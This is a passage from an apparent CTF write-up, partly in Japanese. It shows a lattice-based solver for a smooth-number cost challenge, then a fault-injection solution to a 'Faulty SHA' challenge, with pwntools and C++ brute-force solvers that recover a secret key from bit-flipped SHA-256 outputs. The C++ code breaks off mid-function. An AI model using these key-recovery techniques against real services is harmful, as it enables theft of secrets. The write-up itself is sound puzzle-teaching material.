MAX_TOTAL_TERMS = TARGET_COST - NPR + 1
 
MULTI_BABAI_CHOICES = 2
MULTI_BABAI_FRONTIER = 32
 
BEAM_WIDTH = 10
NEXT_STATES_WIDTH = BEAM_WIDTH * 3
LOCAL_CHILDREN = 2
MID_CHILDREN = 2
LATE_CHILDREN = 3
PER_M = 2
 
LAST2_EXACT_BITS = 40
LAST2_OLD_BITS = 54
 
PRIMES = [int(Primes()[i]) for i in range(NPR)]
CONSTRUCT_CACHE = {}
 
 
def factor_exponents(value):
    exponents = [0] * NPR
    rem = value
    for idx, prime in enumerate(PRIMES):
        while rem % prime == 0:
            exponents[idx] += 1
            rem //= prime
    assert rem == 1
    return exponents
 
 
def smallest_prime_factor(value):
    for prime in PRIMES:
        if value % prime == 0:
            return prime
    raise ValueError(value)
 
 
def build_primitives(limit):
    ops = []
    for value in range(2, limit + 1):
        prime = smallest_prime_factor(value)
        if prime == value:
            ops.append(("+", value - 1, 1))
        else:
            ops.append(("*", value // prime, prime))
    return ops
 
 
def construct_ops(terms):
    ops = build_primitives(PRIMES[-1])
    acc = 0
    for term in terms:
        cur = 1
        for prime, exponent in zip(PRIMES, factor_exponents(term)):
            for _ in range(exponent):
                ops.append(("*", cur, prime))
                cur *= prime
        if acc:
            ops.append(("+", acc, cur))
        acc += cur
    return ops
 
 
def operate(ops):
    values = {1}
    cost = 0
    for op, left, right in ops:
        assert left in values and right in values
        if op == "+":
            values.add(left + right)
            cost += 1
        else:
            values.add(left * right)
    return cost, values
 
 
def smooth_factor(value):
    factor = 1
    rem = value
    for prime in PRIMES:
        while rem % prime == 0:
            rem //= prime
            factor *= prime
    return factor
 
 
def is_smooth(value):
    rem = value
    for prime in PRIMES:
        while rem % prime == 0:
            rem //= prime
    return rem == 1
 
 
def map_varname(value):
    if value == 1:
        return "one"
    out = ""
    rem = value
    while rem:
        out += string.ascii_lowercase[rem % 26]
        rem //= 26
    return out
 
 
def choose_prec(target, m_bits):
    bits = max(2, target.bit_length())
    exp_budget = sum(int(math.ceil(bits / math.log2(prime))) for prime in PRIMES)
    slack = max(8, (exp_budget + 1).bit_length() + 6)
    return max(48, m_bits + slack)
 
 
def lower_bound_for_m(target, m_bits):
    shift = target.bit_length() - m_bits
    if shift > 0:
        lower = target - (1 << shift)
    else:
        lower = 1
    if lower <= 0:
        lower = 1
    return lower
 
 
def construct_context(prec):
    cached = CONSTRUCT_CACHE.get(prec)
    if cached is not None:
        return cached
    field = RealField(prec)
    prime_logs = [field(prime).log(2) for prime in PRIMES]
    base_matrix = (
        Matrix(ZZ, [ZZ(v * 2**prec) for v in prime_logs])
        .stack(identity_matrix(NPR, NPR))
        .transpose()
    )
    cached = (field, prime_logs, base_matrix)
    CONSTRUCT_CACHE[prec] = cached
    return cached
 
 
def build_cvp_instance(target, m_bits):
    if target <= 1:
        return None
    prec = choose_prec(target, m_bits)
    lower = lower_bound_for_m(target, m_bits)
    if lower >= target:
        return None
 
    field, prime_logs, base_matrix = construct_context(prec)
    target_log = field(target).log(2)
    lower_log = field(lower).log(2)
    lbs = [floor(lower_log * 2**prec)] + [0] * NPR
    ubs = [floor(target_log * 2**prec)] + [ceil(target_log / prime_logs[idx]) for idx in range(NPR)]
 
    mat = Matrix(ZZ, base_matrix)
    lb = list(lbs)
    ub = list(ubs)
    max_element = max(abs(mat[row, col]) for row in range(mat.nrows()) for col in range(mat.ncols()))
    weight = mat.ncols() * max_element
    max_diff = max(ub[idx] - lb[idx] for idx in range(mat.ncols()))
    applied_weights = []
    for col in range(mat.ncols()):
        width = ub[col] - lb[col]
        if width == 0:
            col_weight = weight
        else:
            col_weight = max(1, max_diff // width)
        applied_weights.append(int(col_weight))
        for row in range(mat.nrows()):
            mat[row, col] *= col_weight
        lb[col] *= col_weight
        ub[col] *= col_weight
 
    target_vec = vector(ZZ, [(lb[idx] + ub[idx]) // 2 for idx in range(mat.ncols())])
    return {
        "matrix": mat,
        "target": target_vec,
        "weights": applied_weights,
        "limit": int(target),
    }
 
 
def nearest_integers(value, count):
    center = int(value.round())
    out = []
    seen = set()
    radius = 0
    while len(out) < count:
        if radius == 0:
            cands = [center]
        else:
            cands = [center - radius, center + radius]
        cands.sort(key=lambda cand: (abs(value - cand), abs(cand - center), cand))
        for cand in cands:
            if cand in seen:
                continue
            seen.add(cand)
            out.append(cand)
            if len(out) >= count:
                break
        radius += 1
    return out
 
 
def babai_points(matrix, target_vec):
    basis = Matrix(ZZ, matrix).LLL(algorithm="flatter")
    gs = basis.gram_schmidt()[0]
    zero = vector(ZZ, [0] * len(target_vec))
    frontier = [(RR(0), target_vec, zero)]
 
    for row_idx in reversed(range(basis.nrows())):
        denom = gs[row_idx] * gs[row_idx]
        next_frontier = []
        for score, diff, point in frontier:
            if denom == 0:
                coeffs = [0]
            else:
                coord = (diff * gs[row_idx]) / denom
                coeffs = nearest_integers(coord, MULTI_BABAI_CHOICES)
            for coeff in coeffs:
                row = basis[row_idx] * coeff
                diff2 = diff - row
                point2 = point + row
                if denom == 0:
                    extra = RR(0)
                else:
                    extra = (coord - coeff) ** 2 * denom
                next_frontier.append((score + extra, diff2, point2))
        next_frontier.sort(key=lambda item: item[0])
        frontier = []
        seen = set()
        for item in next_frontier:
            key = tuple(int(v) for v in item[2])
            if key in seen:
                continue
            seen.add(key)
            frontier.append(item)
            if len(frontier) >= MULTI_BABAI_FRONTIER:
                break
    return [item[2] for item in frontier]
 
 
def decode_point(point, instance):
    exponents = []
    for idx, weight in enumerate(instance["weights"][1:]):
        coord = int(point[idx + 1])
        if coord % weight != 0:
            return None
        exponent = coord // weight
        if exponent < 0:
            return None
        exponents.append(exponent)
 
    value = 1
    for prime, exponent in zip(PRIMES, exponents):
        value *= prime ** exponent
    if value > instance["limit"]:
        return None
    return int(value)
 
 
def construct_candidates(target, m_bits):
    instance = build_cvp_instance(target, m_bits)
    if instance is None:
        return []
    out = []
    seen = set()
    for point in babai_points(instance["matrix"], instance["target"]):
        value = decode_point(point, instance)
        if value is None or value in seen:
            continue
        seen.add(value)
        out.append(value)
        if len(out) >= PER_M:
            break
    return out
 
 
def iter_construct_candidates(rem):
    start_m = min(60, rem.bit_length() - 1)
    for m_bits in range(start_m, 15, -1):
        for value in construct_candidates(rem, m_bits):
            yield m_bits, value
 
 
def step_state(rem, common, terms, summand):
    next_raw = rem - summand
    factor = smooth_factor(next_raw)
    return next_raw // factor, common * factor, terms + [summand * common]
 
 
def order_states(states):
    states.sort(key=lambda st: st[0])
    out = []
    seen = set()
    for state in states:
        key = (state[0], state[1])
        if key in seen:
            continue
        seen.add(key)
        out.append(state)
    return out
 
 
def choose_child_limits(rem_bits):
    if rem_bits <= 80:
        return LATE_CHILDREN, LATE_CHILDREN * 2
    if rem_bits <= 120:
        return MID_CHILDREN, MID_CHILDREN * 2
    return LOCAL_CHILDREN, LOCAL_CHILDREN
 
 
def collect_children(rem, common, terms, limit=None, raw_limit=None, m_band=None):
    rem_bits = rem.bit_length()
    if limit is None or raw_limit is None:
        default_limit, default_raw = choose_child_limits(rem_bits)
        if limit is None:
            limit = default_limit
        if raw_limit is None:
            raw_limit = default_raw
 
    children = []
    seen_summands = set()
 
    def add_child(m_bits, summand):
        if summand >= rem or summand in seen_summands:
            return
        seen_summands.add(summand)
        children.append((*step_state(rem, common, terms, summand), m_bits))
 
    if m_band is None:
        for m_bits, summand in iter_construct_candidates(rem):
            add_child(m_bits, summand)
            if len(children) >= raw_limit:
                break
    else:
        start_m = min(60, rem_bits - 1)
        stop_m = max(16, start_m - m_band + 1)
        for m_bits in range(start_m, stop_m - 1, -1):
            for summand in construct_candidates(rem, m_bits):
                add_child(m_bits, summand)
        if len(children) < raw_limit:
            for m_bits in range(stop_m - 1, 15, -1):
                for summand in construct_candidates(rem, m_bits):
                    add_child(m_bits, summand)
                    if len(children) >= raw_limit:
                        break
                if len(children) >= raw_limit:
                    break
 
    best = {}
    for child in children:
        key = child[0]
        if key not in best:
            best[key] = child
    out = list(best.values())
    out.sort(key=lambda st: st[0])
    return out[:limit]
 
 
values = []
def rec(idx, cur):
    if idx == len(PRIMES):
        values.append(cur)
        return
    prime = PRIMES[idx]
    value = cur
    while value < 2**32:
        rec(idx + 1, value)
        value *= prime
rec(0, 1)
values.sort()
 
def solve_last2(total):
    left = 0
    right = len(values) - 1
    while left <= right:
        pair_sum = values[left] + values[right]
        if pair_sum == total:
            return values[left], values[right]
        if pair_sum < total:
            left += 1
        else:
            right -= 1
    return None
 
def close_state(depth, rem, common, terms):
    remaining_terms = MAX_TOTAL_TERMS - depth
    if remaining_terms >= 1 and is_smooth(rem):
        print(f"    [close last1] depth={depth} rem_bits={rem.bit_length()} total_terms={len(terms) + 1}")
        return terms + [rem * common]
    if remaining_terms >= 2 and rem < 2**32:
        pair = solve_last2(rem)
        if pair is not None:
            print(f"    [close last2] depth={depth} rem_bits={rem.bit_length()} total_terms={len(terms) + 2}")
            return terms + [pair[0] * common, pair[1] * common]
    return None
 
 
def find_terms_cost23(target):
    common = smooth_factor(target)
    rem = target // common
    ans = close_state(0, rem, common, [])
    if ans is not None:
        return ans
 
    beam = [(rem, common, [])]
    print(f"[+] search n={NPR} beam={BEAM_WIDTH} target_cost<={TARGET_COST} max_terms={MAX_TOTAL_TERMS}")
    for depth in range(1, MAX_TOTAL_TERMS):
        child_buffers = []
        child_heap = []
        for parent_idx, (rem, common, terms) in enumerate(beam):
            children = collect_children(rem, common, terms)
            if not children:
                continue
            child_buffers.append(children)
            rem2, _common2, _terms2, _m_bits = children[0]
            heapq.heappush(child_heap, (rem2, len(child_buffers) - 1, 0))
        if not child_heap:
            break
 
        next_states = []
        while child_heap and len(next_states) < NEXT_STATES_WIDTH:
            _key, buf_idx, child_idx = heapq.heappop(child_heap)
            rem2, common2, terms2, _m_bits = child_buffers[buf_idx][child_idx]
            ans = close_state(depth, rem2, common2, terms2)
            if ans is not None:
                return ans
            next_states.append((rem2, common2, terms2))
            next_idx = child_idx + 1
            if next_idx < len(child_buffers[buf_idx]):
                rem3, _common3, _terms3, _m_bits = child_buffers[buf_idx][next_idx]
                heapq.heappush(child_heap, (rem3, buf_idx, next_idx))
 
        if not next_states:
            break
 
        ordered = order_states(next_states)
        beam = ordered[:BEAM_WIDTH]
        print(f"  [depth {depth}] pool={len(ordered)} kept={len(beam)} best_bits={[state[0].bit_length() for state in beam]}")
    raise RuntimeError(f"search failed within target_cost={TARGET_COST}")
 
 
def send_solution(conn, target, terms):
    ops = construct_ops(terms)
    cost, values = operate(ops)
    assert target in values
    assert cost <= TARGET_COST, cost
 
    declared = set()
    for op, left, right in ops:
        out = left + right if op == "+" else left * right
        if out in declared:
            continue
        conn.sendline(f"{map_varname(out)}={map_varname(left)}{op}{map_varname(right)}".encode())
        declared.add(out)
    conn.sendline(f"result=one*{map_varname(target)}".encode())
 
 
def main():
    conn = remote("localhost", 1337)
    conn.recvuntil(b"target = ")
    target = int(conn.recvline())
    print(f"[+] target bits={target.bit_length()}")
    terms = find_terms_cost23(target)
    cost = NPR + len(terms) - 1
    print(f"[+] found candidate terms={len(terms)} cost={cost}")
    send_solution(conn, target, terms)
    print(conn.recvall(timeout=3).decode(errors="replace"), end="")
 
 
if __name__ == "__main__":
    main()

At the time of challenge creation I hadn't thought of this, but if we restrict the primes used to just $2,3,5,7,11,13$ (6 primes), it becomes possible to efficiently find the largest smooth number below $T$ exactly. With 6 primes, we need to represent target as a sum of 18 smooth numbers, giving 4 more terms than with 10 primes. However, the tradeoff is that the degree of freedom among smooth numbers is smaller, density drops, and the number of bits we can match at once decreases. Additional experiments confirmed that cost 24 is achievable with 6 primes, but cost 23 is likely difficult or very low probability.

The interesting point of this challenge was that it requires LLL despite its simple appearance, but apparently a competitive-programming-style algorithm can already achieve cost 24 — this seems to have acted as a rabbit hole, which I regret.

crypto

Faulty SHA (1 solve)

問題

次のようなサーバが与えられます。

from random import Random
import inspect
import os
# https://github.com/keanemind/python-sha-256/blob/master/sha256.py
import sha256
 
flag = os.environ.get("FLAG", "tkbctf{dummy}")
key = Random(sha256.generate_hash(flag)).randbytes(55)
 
pos = int(input("pos: "))
source = bytearray(inspect.getsource(sha256), "utf-8")
source[pos // 8] ^= 1 << (pos % 8)
exec(bytes(source), sha256.__dict__)
 
print("hash:", sha256.generate_hash(key).hex())
if bytes.fromhex(input("key: ")) == key:
    print(flag)
else:
    print("wrong")

sha256.py は GitHub で公開されている SHA-256 実装（keanemind/python-sha-256）です。pos で指定したビットだけ反転したソースで sha256 モジュールが上書きされ、key のハッシュが返されます。key = Random(SHA256(flag)).randbytes(55) は接続のたびに同じ値なので、複数回接続してそれぞれ別のビットを壊すことで、異なる視点から key の情報を集められます。

解法

解法は次の 4 ステップに分かれます。

入力の最初の 24 バイトを求める
message_schedule[16:24] を求める
message_schedule[9:14] を求める
message_schedule[6:9] を求める

1. 入力の最初の 24 バイトの特定

SHA-256 のメッセージスケジュール計算は次のようになっています。

for t in range(0, 64):
    if t <= 15:
        message_schedule.append(bytes(message_block[t*4:(t*4)+4]))
    else:
        ...（展開式）

55 バイトの key をパディングすると 64 バイト（= 1 ブロック）になり、message_schedule(以降wとします) の最初の 16 要素がメッセージの 16 ワードに対応します。このうち w[14] = 0x00000000、w[15] = 0x000001B8（ $= 55 \times 8 = 440$ ）はパディングで固定です。

以下の 7 種類の反転を順に使います。それぞれ反転によって入力の一部の値しか使わずに出力を計算するようになっており、各ステップで新たに増える未知の値は 4 バイト以下であることから、前のステップまでで特定した既知の値を固定した上で $2^{32}$ 以内の全探索で特定できます。ハッシュ出力が依存する値を列挙しており、太字が直前のステップまでで未知だった値です。

pos	行	変更	依存
19362	61	`[t4:(t4)+4]` →`[t4:(t0)+4]`	key[0], key[1], key[2], key[3]
19321	61	`[t4:(t4)+4]` →`[t6:(t4)+4]`	key[0:4], key[6], key[7]
19320	61	`[t4:(t4)+4]` →`[t5:(t4)+4]`	key[0:4], key[5], key[6:8], key[10], key[11], key[15]
19352	61	`[t4:(t4)+4]` →`[t*4:(t+4)+4]`	key[0:4], key[4], key[5:8], key[8], key[9]
26438	87	`message_schedule[t]` →`message_schedule[4]`	key[16], key[17], key[18], key[19]
19326	61	`[t4:(t4)+4]` →`[tt:(t4)+4]`	key[0:12], key[12], key[13], key[14], key[15:20]
14634	40	`blocks.append(message[i:i+64])` →`blocks.append(message[i:i+24])`	key[0:20], key[20], key[21], key[22], key[23]

以上で key[0:24]（スケジュールの最初の 6 ワード w[0:6]）が得られます。

この7種類の反転は、人力でパズルすることでも見つけられますが、すべてのビット位置（約 32000 通り）を試し、エラーなく実行でき、かつ定数部分（K 配列や初期ハッシュ値）以外を壊しているものに絞る（約 500 通り）と、各位置について入力を 1 バイトずつ変えて出力の依存バイトを調べることができ、有用な位置を網羅的に発見できます。

2. `message_schedule[16:24]` を求める

sha256の圧縮関数は次のようになっています。

# Iterate for t=0 to 63
for t in range(64):
    t1 = ((h + _capsigma1(e) + _ch(e, f, g) + K[t] +
            int.from_bytes(message_schedule[t], 'big')) % 2**32)
 
    t2 = (_capsigma0(a) + _maj(a, b, c)) % 2**32
 
    h = g
    g = f
    f = e
    e = (d + t1) % 2**32
    d = c
    c = b
    b = a
    a = (t1 + t2) % 2**32

ラウンド $t$ 終了後の変数の組 $[a,b,c,d,e,f,g,h]$ を $S_t$ と書きます。

重要な点として、w[t]が既知であれば、ラウンド関数は以下のようにして逆方向に計算することができます。

def inv_round(s, t, w):
    a_new, a, b, c, e_new, e, f, g = s
    t2 = (capsigma0(a) + maj(a, b, c)) % MOD
    t1 = (a_new - t2) % MOD
    d = (e_new - t1) % MOD
    h = (t1 - capsigma1(e) - ch(e, f, g) - K[t] - w) % MOD
    return [a, b, c, d, e, f, g, h]

w[16:24]を求めるため、以下の2種類の反転の結果を用います。

pos=17675（57行目、if t <= 15: → if t <= 95:）
スケジュール計算ループ内の $t$ は最大 63 なので t <= 95 は常に真になります。 $t \geq 16$ では message_block[t*4:(t*4)+4] が空スライスになるため、 $w[16]$ 以降はすべて 0 になります。
pos=25498（85行目、for t in range(64): → for t in range(24):）
スケジュール準備ループは変更されないため $w[0:64]$ は正常に計算されますが、ハッシュ計算ループが 24 ラウンドで終了します。

1つ目の出力からinit_stateを引いた後にinv_round(s, t, 0) を $t=63$ から $t=16$ まで 48 回逆向きに適用すれば $S_{15}$ が得られます。

2つ目の出力からinit_stateを引くと $S_{23}$ が得られます。

$w[16:24]$ の抽出

$S_{23}$ に対し inv_round(s, t, 0) を $t=23$ から $t=16$ まで 8 回適用します。

inv_round の出力は [a, b, c, d, e, f, g, h] ですが、各成分がどこから来るか見ると、

a, b, c：入力の s[1], s[2], s[3]
e, f, g：入力の s[5], s[6], s[7]
d： s[4] - t1（s[0], s[1], s[2], s[3], s[5] に依存）
h： t1 - capsigma1(e) - ch(e, f, g) - K[t] - w（s[0:4], s[5:8]とwに依存）

となっており、正しくない値 w=0 で $S_{22}$ を計算すると、出力の先頭7成分は正しく、h のみが誤ります。次の $S_{21}$ の計算ではその誤った h が使われることにより、誤りはgへ伝播します。これが繰り返され、以下のoの部分のみ正しい値が得られます。

     a b c d e f g h
15 | o o o o o o o o <- S_15
16 | o
17 | o o
18 | o o o
19 | o o o o
20 | o o o o o        ^
21 | o o o o o o      |
22 | o o o o o o o    |
23 | o o o o o o o o <- S_23

aはすべてのラウンドで正しい値が得られています。

$a_{t+1}$ と $S_t$ が分かると $t1_t, t2_t$ が求まり、更に $S_{t+1}$ と $w[t+1]$ が以下のようにして求まります。

def advance(S, a_next, t):
    a, b, c, d, e, f, g, h = S
    t2 = (capsigma0(a) + maj(a, b, c)) % MOD
    t1 = (a_next - t2) % MOD
    e_next = (d + t1) % MOD
    S_next = [a_next, a, b, c, e_next, e, f, g]
    w = (t1 - h - capsigma1(e) - ch(e, f, g) - K[t+1]) % MOD
    return S_next, w

まとめると、 $a_t$ （ $t = 16, \ldots, 23$ ）と $S_{15}$ を出発点として、 $t = 15, 16, \ldots, 22$ の順に advance を呼ぶことで $w[16:24]$ が得られます。

3. $w[9:14]$ を求める

ここまでで得られた情報をまとめます。

w[0:6]：ステップ 1で得たkey[0:24]
w[14] = 0、w[15] = 440：パディング固定値
w[16:24]：ステップ 2 で復元した

SHA-256 のスケジュール展開式 $w[t] = \sigma_1(w[t-2]) + w[t-7] + \sigma_0(w[t-15]) + w[t-16]$ を各未知数について解きます。

$w[t-7]$ について解くと、

$w[t-7] = w[t] - \sigma_1(w[t-2]) - \sigma_0(w[t-15]) - w[t-16]$

となり、 $t = 16, 17, 18, 19, 20$ と代入すると、それぞれ $w[9], w[10], w[11], w[12], w[13]$ が既知の値のみから順に求まります。

4. $w[6:9]$ を求める

$w[t-16]$ について解くと、

$w[t-16] = w[t] - \sigma_1(w[t-2]) - w[t-7] - \sigma_0(w[t-15])$

となります。 $w[8]$ を $2^{32}$ 通り全探索し、各候補に対して

$t = 23$ ： $w[7] = w[23] - \sigma_1(w[21]) - w[16] - \sigma_0(w[8])$
$t = 22$ ： $w[6] = w[22] - \sigma_1(w[20]) - w[15] - \sigma_0(w[7])$
$t = 21$ で検証： $w[5] \stackrel{?}{=} w[21] - \sigma_1(w[19]) - w[14] - \sigma_0(w[6])$

のように計算します。検証をパスした候補が正しい $w[8]$ であり、 $w[6], w[7]$ も同時に得られます。

これで w[0:14] が揃い、w[0] から w[13] の先頭 3 バイトまでを連結した 55 バイトの鍵が復元でき、フラグが得られます。

複数回 $2^{32}$ の全探索が必要なため、実装はPythonではなくC++などの高速な言語で行うと良いでしょう。これくらいはAIに任せると良いと思います。ソルバは以下の通りです。

ソルバのPython部分（クリックで展開）

import sys
from pwn import *
import ast
from Crypto.Util.number import long_to_bytes
 
def state2bytes(state):
    return b"".join([v.to_bytes(4, "big") for v in state])
 
def bytes2state(b):
    return [int.from_bytes(b[i*4:i*4+4], "big") for i in range(8)]
 
def oracle(idx):
    with remote("localhost", 1337) as sc:
        sc.sendlineafter(b"pos: ", str(idx).encode())
        sc.recvuntil(b"hash: ")
        hash = bytes2state(bytes.fromhex(sc.recvline().decode()))
        return hash
 
import sha256
import inspect
 
source = bytearray(inspect.getsource(sha256), "utf-8")
 
hash1 = oracle(source.index(b"if t <= 15") * 8 + 67)  # if t <= 95:
hash2 = oracle(source.index(b"range(64)") * 8 + 50)   # range(24)
hash3 = oracle(source.index(b"[t*4:(t*4)+4]") * 8 + 66)  # [t*4:(t*0)+4]
hash4 = oracle(source.index(b"[t*4:(t*4)+4]") * 8 + 25)  # [t*6:(t*4)+4]
hash5 = oracle(source.index(b"[t*4:(t*4)+4]") * 8 + 24)  # [t*5:(t*4)+4]
hash6 = oracle(source.index(b"[t*4:(t*4)+4]") * 8 + 56)  # [t*4:(t+4)+4]
hash7 = oracle(source.index(b"message_schedule[t]") * 8 + 142)  # message_schedule[4]
hash8 = oracle(source.index(b"[t*4:(t*4)+4]") * 8 + 30)  # [t*t:(t*4)+4]
hash9 = oracle(source.index(b"message[i:i+64]") * 8 + 98)  # message[i:i+24]
 
sol = process(["./solver2"], env={"OMP_CANCELLATION": "TRUE"})
sol.sendline(" ".join(map(str, hash1)).encode())
sol.sendline(" ".join(map(str, hash2)).encode())
sol.sendline(" ".join(map(str, hash3)).encode())
sol.sendline(" ".join(map(str, hash4)).encode())
sol.sendline(" ".join(map(str, hash5)).encode())
sol.sendline(" ".join(map(str, hash6)).encode())
sol.sendline(" ".join(map(str, hash7)).encode())
sol.sendline(" ".join(map(str, hash8)).encode())
sol.sendline(" ".join(map(str, hash9)).encode())
 
for _ in range(8):
    print(sol.recvline())
 
key = ast.literal_eval(sol.recvline().decode())
key = b"".join([long_to_bytes(v, 4) for v in key])[:-1][:55]
 
print(key.hex())
 
with remote("localhost", 1337) as sc:
    sc.sendlineafter(b"pos: ", str(source.index(b"#") * 8 + 8).encode())
    sc.recvuntil(b"hash: ")
    hash = bytes2state(bytes.fromhex(sc.recvline().decode()))
    sc.recvuntil(b"key: ")
    sc.sendline(key.hex())
    print(sc.recvline())

ソルバのC++部分（クリックで展開）

#include <iostream>
#include <vector>
#include <array>
#include <cstdint>
#include <string>
#include <algorithm>
#include <omp.h>
 
#define forb(k) for (uint64_t k = 0; k < 256; k++)
 
const std::array<uint64_t, 64> K = {
    0x428a2f98, 0x71374491, 0xb5c0fbcf, 0xe9b5dba5, 0x3956c25b, 0x59f111f1, 0x923f82a4, 0xab1c5ed5,
    0xd807aa98, 0x12835b01, 0x243185be, 0x550c7dc3, 0x72be5d74, 0x80deb1fe, 0x9bdc06a7, 0xc19bf174,
    0xe49b69c1, 0xefbe4786, 0x0fc19dc6, 0x240ca1cc, 0x2de92c6f, 0x4a7484aa, 0x5cb0a9dc, 0x76f988da,
    0x983e5152, 0xa831c66d, 0xb00327c8, 0xbf597fc7, 0xc6e00bf3, 0xd5a79147, 0x06ca6351, 0x14292967,
    0x27b70a85, 0x2e1b2138, 0x4d2c6dfc, 0x53380d13, 0x650a7354, 0x766a0abb, 0x81c2c92e, 0x92722c85,
    0xa2bfe8a1, 0xa81a664b, 0xc24b8b70, 0xc76c51a3, 0xd192e819, 0xd6990624, 0xf40e3585, 0x106aa070,
    0x19a4c116, 0x1e376c08, 0x2748774c, 0x34b0bcb5, 0x391c0cb3, 0x4ed8aa4a, 0x5b9cca4f, 0x682e6ff3,
    0x748f82ee, 0x78a5636f, 0x84c87814, 0x8cc70208, 0x90befffa, 0xa4506ceb, 0xbef9a3f7, 0xc67178f2
};
 
const std::array<uint64_t, 8> init_state = { 0x6a09e667, 0xbb67ae85, 0x3c6ef372, 0xa54ff53a, 0x510e527f, 0x9b05688c, 0x1f83d9ab, 0x5be0cd19 };
 
std::array<uint64_t, 8> hash1{};
std::array<uint64_t, 8> hash2{};
std::array<uint64_t, 8> hash3{};
std::array<uint64_t, 8> hash4{};
std::array<uint64_t, 8> hash5{};
std::array<uint64_t, 8> hash6{};
std::array<uint64_t, 8> hash7{};
std::array<uint64_t, 8> hash8{};
std::array<uint64_t, 8> hash9{};
 
void read_hash(std::array<uint64_t, 8> &hash) {
    for (auto &value : hash) {
        std::cin >> value;
    }
}
 
inline uint64_t rotate_right(uint64_t value, uint64_t shift) {
    return (value >> shift) | (value << (32 - shift));
}
inline uint64_t sigma0(uint64_t x) {
    return rotate_right(x, 7) ^ rotate_right(x, 18) ^ (x >> 3);
}
inline uint64_t sigma1(uint64_t x) {
    return rotate_right(x, 17) ^ rotate_right(x, 19) ^ (x >> 10);
}
inline uint64_t capsigma0(uint64_t x) {
    return rotate_right(x, 2) ^ rotate_right(x, 13) ^ rotate_right(x, 22);
}
inline uint64_t capsigma1(uint64_t x) {
    return rotate_right(x, 6) ^ rotate_right(x, 11) ^ rotate_right(x, 25);
}
inline uint64_t ch(uint64_t x, uint64_t y, uint64_t z) {
    return (x & y) ^ (~x & z);
}
inline uint64_t maj(uint64_t x, uint64_t y, uint64_t z) {
    return (x & y) ^ (x & z) ^ (y & z);
}
 
inline std::array<uint64_t, 8> round(const std::array<uint64_t, 8> &state, size_t t, uint64_t msg) {
    uint64_t a = state[0], b = state[1], c = state[2], d = state[3];
    uint64_t e = state[4], f = state[5], g = state[6], h = state[7];
    uint64_t t1 = h + capsigma1(e) + ch(e, f, g) + K[t] + msg;
    uint64_t t2 = capsigma0(a) + maj(a, b, c);
    return { (t1 + t2) & 0xffffffff, a, b, c, (d + t1) & 0xffffffff, e, f, g };
}
 
inline std::array<uint64_t, 8> inv_round(const std::array<uint64_t, 8> &state, size_t t, uint64_t msg) {
    uint64_t a = state[0], b = state[1], c = state[2], d = state[3];
    uint64_t e = state[4], f = state[5], g = state[6], h = state[7];
    uint64_t t2 = capsigma0(b) + maj(b, c, d);
    uint64_t t1 = a - t2;
    return { b, c, d, (e - t1) & 0xffffffff, f, g, h, (t1 - capsigma1(f) - ch(f, g, h) - K[t] - msg) & 0xffffffff };
}
 
template <size_t N>
inline void extend_schedule(const std::array<uint64_t, N> &initial, std::array<uint64_t, 64> &schedule) {
    static_assert(N <= 64);
    for (size_t i = 0; i < N; i++) {
        schedule[i] = initial[i];
    }
    for (size_t t = N; t < 64; t++) {
        uint64_t value = sigma1(schedule[t-2]) + schedule[t-7] + sigma0(schedule[t-15]) + schedule[t-16];
        schedule[t] = value & 0xffffffff;
    }
}
 
template <size_t N>
std::array<uint64_t, 8> calc_sha256(const std::array<uint64_t, N> &key) {
    std::array<uint64_t, 64> schedule {};
    extend_schedule(key, schedule);
    std::array<uint64_t, 8> state = init_state;
    for (size_t t = 0; t < 64; t++) {
        state = round(state, t, schedule[t]);
    }
    for (size_t i = 0; i < 8; i++) {
        state[i] = (state[i] + init_state[i]) & 0xffffffff;
    }
    return state;
}
 
void search_key_1(std::vector<uint64_t> &kb) {
    bool found = false;
    #pragma omp parallel
    #pragma omp for collapse(4)
    forb (k0) forb (k1) forb (k2) forb (k3) {
        if (found) {
            #pragma omp cancel for
        }
        std::array<uint64_t, 16> key = {};
        key[0] = k0<<24 | k1<<16 | k2<<8 | k3;
        if (calc_sha256(key) == hash3) {
            found = true;
            std::cout << "#1 found" << std::endl;
            kb[0] = k0; kb[1] = k1; kb[2] = k2; kb[3] = k3;
            #pragma omp cancel for
        }
        #pragma omp cancellation point for
    }
}
 
void search_key_2(std::vector<uint64_t> &kb) {
    bool found = false;
    #pragma omp parallel
    #pragma omp for collapse(2)
    forb (k0) forb (k1) {
        if (found) {
            #pragma omp cancel for
        }
        std::array<uint64_t, 16> key = {};
        key[0] = kb[0]<<24 | kb[1]<<16 | kb[2]<<8 | kb[3];
        key[1] = k0<<8 | k1;
        if (calc_sha256(key) == hash4) {
            found = true;
            std::cout << "#2 found" << std::endl;
            kb[6] = k0; kb[7] = k1;
            #pragma omp cancel for
        }
        #pragma omp cancellation point for
    }
}
 
void search_key_3(std::vector<uint64_t> &kb) {
    bool found = false;
    #pragma omp parallel
    #pragma omp for collapse(4)
    forb (k0) forb (k1) forb (k2) forb (k3) {
        if (found) {
            #pragma omp cancel for
        }
        std::array<uint64_t, 16> key = {};
        key[0] = kb[0]<<24 | kb[1]<<16 | kb[2]<<8 | kb[3];
        key[1] = k0<<16 | kb[6]<<8 | kb[7];
        key[2] = k1<<8 | k2;
        key[3] = k3;
        if (calc_sha256(key) == hash5) {
            found = true;
            std::cout << "#3 found" << std::endl;
            kb[5] = k0; kb[10] = k1; kb[11] = k2; kb[15] = k3;
            #pragma omp cancel for
        }
        #pragma omp cancellation point for
    }
}
 
void search_key_4(std::vector<uint64_t> &kb) {
    bool found = false;
    #pragma omp parallel
    #pragma omp for collapse(3)
    forb (k0) forb (k1) forb (k2) {
        if (found) {
            #pragma omp cancel for
        }
        std::array<uint64_t, 16> key = {};
        key[0] = kb[0]<<56 | kb[1]<<48 | kb[2]<<40 | kb[3]<<32 | k0<<24 | kb[5]<<16 | kb[6]<<8 | kb[7];
        key[1] = k0<<32 | kb[5]<<24 | kb[6]<<16 | kb[7]<<8 | k1;
        key[2] = k1<<8 | k2;
        if (calc_sha256(key) == hash6) {
            found = true;
            std::cout << "#4 found" << std::endl;
            kb[4] = k0; kb[8] = k1; kb[9] = k2;
            #pragma omp cancel for
        }
        #pragma omp cancellation point for
    }
}
 
void search_key_5(std::vector<uint64_t> &kb) {
    bool found = false;
    #pragma omp parallel
    #pragma omp for collapse(4)
    forb (k0) forb (k1) forb (k2) forb (k3) {
        if (found) {
            #pragma omp cancel for
        }
        std::array<uint64_t, 64> key;
        key.fill(k0<<24 | k1<<16 | k2<<8 | k3);
        if (calc_sha256(key) == hash7) {
            found = true;
            std::cout << "#5 found" << std::endl;
            kb[16] = k0; kb[17] = k1; kb[18] = k2; kb[19] = k3;
            #pragma omp cancel for
        }
        #pragma omp cancellation point for
